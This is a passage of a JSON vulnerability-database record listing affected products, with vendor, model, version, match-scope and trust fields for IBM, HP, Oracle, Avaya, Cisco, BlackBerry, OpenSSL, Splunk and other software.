"suse", "version": "11" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "business server", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "1" }, { "model": "tivoli network performance manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x24087380" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "sterling control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "network node manager ispi for ip multicast qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "norman shark industrial control system protection", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "5.3" }, { "model": "domino fp if3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.24" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.10" }, { "model": "websphere process server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.2" }, { "model": "prime lan management solution", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "wide area application services", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "command center appliance", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "workload deployer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.96" }, { "model": "jre update4", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.2" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.0.3" }, { "model": "netscaler gateway", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "enterprise manager ops center", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.3" }, { "model": "unified attendant console advanced", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.2" }, { "model": "cognos tm1 fp if", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5.238" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2.1" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4.1" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.5.036" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32100" }, { "model": "db2 connect unlimited edition for system i", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70006.4" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "initiate master data service provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.7" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "project openssl 0.9.8n", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.14" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.1" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.11" }, { "model": "rational sap connector", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0.7" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.3" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "systems insight manager sp5", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.2.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.2.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.2.0.3" }, { "model": "bcaaa", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "6.1" }, { "model": "work connect for bes10/bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "1.0.17483.21" }, { "model": "jdk update24", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "upward integration modules for microsoft system center", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "5.5.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4.1.8" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.1" }, { "model": "buildforge", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.1" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.051" }, { "model": "upward integration modules hardware management pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.2" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "5" }, { "model": "jre", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.8.0" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.4" }, { "model": "domino if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.06" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.29" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.9" }, { "model": "one-x client enablement services sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "content analysis system", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.102" }, { "model": "tivoli workload scheduler distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "jre update5", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.50" }, { "model": "anyres live", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "blend for mac", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "0" }, { "model": "java sdk", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.15" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0" }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "java", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.195" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.034" }, { "model": "java sdk sr16", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6" }, { "model": "upward integration modules for microsoft system center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.5.1" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.5.0.2" }, { "model": "security appscan standard", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "rational collaborative lifecycle management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.3" }, { "model": "xiv storage system gen3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "11.1.0" }, { "model": "rational rhapsody design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.0.1" }, { "model": "cognos insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.2.3.2" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1.4" }, { "model": "web experience factory", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "work space manager for bes10/bes12 24755 137", "scope": null, "trust": 0.3, "vendor": "blackberry", "version": null }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.13" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.11" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.1.3.3" }, { "model": "websphere portal", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.5.1" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7.770" }, { "model": "operations analytics predictive insights", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.3.1" }, { "model": "infosphere global name management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "jdk 1.5.0.0 04", "scope": null, "trust": 0.3, "vendor": "sun", "version": null }, { "model": "malware analysis appliance", "scope": "eq", "trust": 0.3, "vendor": "bluecoat", "version": "4.2" }, { "model": "network node manager ispi performance for qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.2" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.8" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.4" }, { "model": "hp-ux b.11.11 (11i", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "v1)" }, { "model": "enterprise linux desktop", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "7" }, { "model": "jdk update28", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.280" }, { "model": "domino fp", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.36" }, { "model": "secure work space for bes10/bes12", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "12.1.0.150360" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.1" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1.0.6" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "5.0.6" }, { "model": "data ontap operating in 7-mode", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.7" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "tivoli asset management for it", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.010" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1.2" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "9.0" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.038" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.5" }, { "model": "dataquant", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.2" }, { "model": "websphere service registry and repository studio", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.3" }, { "model": "rational engineering lifecycle manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.3" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.0.4" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073800" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.11" }, { "model": "jdk update7", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.9" }, { "model": "flex system fc3171 8gb san switch and san pass-thru", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1.0.00" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.04" }, { "model": "network node manager ispi performance for metrics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.2" }, { "model": "phaser", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "36001.70.03.06" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.1-73" }, { "model": "infosphere balanced warehouse c4000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jre update11", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "control center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.0.0" }, { "model": "infosphere master data management patient hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.2" }, { "model": "splunk", "scope": "eq", "trust": 0.3, "vendor": "splunk", "version": "6.1.4" }, { "model": "pureapplication system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.0.5" }, { "model": "network node manager ispi performance for qa", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "system idataplex dx360 m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x63910" }, { "model": "infosphere master data management server", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "11.4" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.5" }, { "model": "flashcopy manager for oracle with sap environments", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2.0.4" }, { "model": "aura utility services sp7", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.1.6" }, { "model": "jre update27", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "jre update17", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.7.0" }, { "model": "jdk update27", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.0.270" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.32" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0" }, { "model": "tivoli monitoring fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.303" }, { "model": "initiate master data service", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "9.5" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.56" }, { "model": "chassis management module 2pet10h", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v50007.3.0.12" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "smartcloud entry", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.4.0" }, { "model": "application policy infrastructure controller", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1.1(0.625)" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x88079030" }, { "model": "upward integration modules for vmware vsphere", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.5.3" }, { "model": "tivoli asset discovery for distributed", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "notes", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage b", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "linux mips", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.19" }, { "model": "network node manager ispi performance for metrics", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "9.0" }, { "model": "tivoli asset management for it", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.12" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "flashsystem 9848-ac1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0.0.25" }, { "model": "blend for blackberry", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "100" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "prime data center network manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "business intelligence enterprise edition", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "11.1.1.7" }, { "model": "jdk update", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.6.013" }, { "model": "smartcloud entry fix pack", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.21" }, { "model": "cognos tm1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "java sdk 6r1 sr8-fp4", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jdk", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)5.0" }, { "model": "infosphere master data management provider hub", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "10.0" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.12" }, { "model": "sterling control center ifix03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.41" }, { "model": "rational application developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "rational software architect for websphere software", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0.0.3" }, { "model": "norman shark industrial control system protection", "scope": "ne", "trust": 0.3, "vendor": "bluecoat", "version": "5.3.2" }, { "model": "version control repository manager 7.4.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.3.740" }, { "model": "jdk 07", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5" }, { "model": "one-x client enablement services sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.4" }, { "model": "flashsystem 9846-ae1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v840" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "business process manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.1" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "32153.50.01.10" }, { "model": "websphere appliance management center", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.0" }, { "model": "one-x client enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "messaging application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22279160" }, { "model": "maximo asset management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1.11" }, { "model": "jdk update31", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.5.11" }, { "model": "os", "scope": "eq", "trust": 0.3, "vendor": "blackberry", "version": "3.6" }, { "model": "flashsystem 9846-ac2", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v90000" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.0.3" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.3.8.3" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.3.1" }, { "model": "rational requirements composer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1.5" }, { "model": "chassis management module 2pet12i", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "tivoli application dependency discovery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2.1" }, { "model": "tivoli monitoring", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.2.2" }, { "model": "domino fp if", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.366" }, { "model": "jdk update13", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "infosphere information server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.7" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0" }, { "model": "chassis management module 2pet10m", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.6" }, { "model": "cognos business intelligence server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10.2.2" }, { "model": "tivoli system automation for integrated operations management", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.1.1" }, { "model": "rational team concert", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.4" }, { "model": "jre update", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "1.6.032" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.0" }, { "model": "unified ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "88310" }, { "model": "project openssl 1.0.0e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational doors web access", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.45" }, { "model": "rational business developer", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "security privileged identity manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "project openssl a", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.0.820" }, { "model": "websphere mq", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.4" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.03" }, { "model": "infosphere balanced warehouse c3000", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "jdk update19", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0" }, { "model": "chassis management module 2pete5o", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "flashsystem 9848-ac2", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v90007.5.1.0" }, { "model": "communications session border controller scz7.2.0", "scope": null, "trust": 0.3, "vendor": "oracle", "version": null }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "rational developer for aix and cobol", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1" }, { "model": "websphere application server", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.1.21" }, { "model": "multi-enterprise integration gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.0.0.1" }, { "model": "storwize", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "v70007.5.0.2" }, { "model": "src series", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "endeca server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "7.3.0" }, { "model": "datapower gateway", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.0.1.8" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.4" }, { "model": "project openssl 0.9.8t", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "rational software architect design manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.7" }, { "model": "buildforge ifix", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.1.3.66" }, { "model": "system m3 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x355079440" }, { "model": "rational functional tester", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.32" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "42000" }, { "model": "hosted collaboration mediation fulfillment", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "flashcopy manager for vmware", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1.2.0" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "domino", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.1.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.14.20" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.5.760" }, { "model": "websphere real time sr7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.1.2" }, { "model": "websphere service registry and repository", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.0" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1" }, { "model": "cloud manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35006.4" }, { "model": "sterling connect:direct browser", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.4.2" }, { "model": "jdk update30", "scope": "eq", "trust": 0.3, "vendor": "sun", "version": "1.5.0.300" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2.1" }, { "model": "rational software architect design manager", 